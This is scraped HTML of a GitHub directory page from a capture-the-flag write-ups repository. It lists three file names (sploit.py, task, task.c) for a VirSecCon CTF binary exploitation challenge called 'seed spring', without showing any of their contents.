<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> KEERRO </span> <span>/</span> ctf-writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>4</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>27</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>2</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>1</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/KEERRO/ctf-writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":162845937,"originating_url":"https://github.com/KEERRO/ctf-writeups/tree/master/VirSecCon%20CTF/binary%20exploitation/seed%20spring","user_id":null}}" data-hydro-click-hmac="131556bbe5fc22d627325d0a78dea1b34a553629aa0f985d6843a1080b741ef0"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>VirSecCon CTF</span></span><span>/</span><span><span>binary exploitation</span></span><span>/</span>seed spring<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>VirSecCon CTF</span></span><span>/</span><span><span>binary exploitation</span></span><span>/</span>seed spring<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/KEERRO/ctf-writeups/tree-commit/06bbaff46db8a3bdd138b18de938f9440e4e83b8/VirSecCon%20CTF/binary%20exploitation/seed%20spring" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/KEERRO/ctf-writeups/file-list/master/VirSecCon%20CTF/binary%20exploitation/seed%20spring"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>sploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>task</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>task.c</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
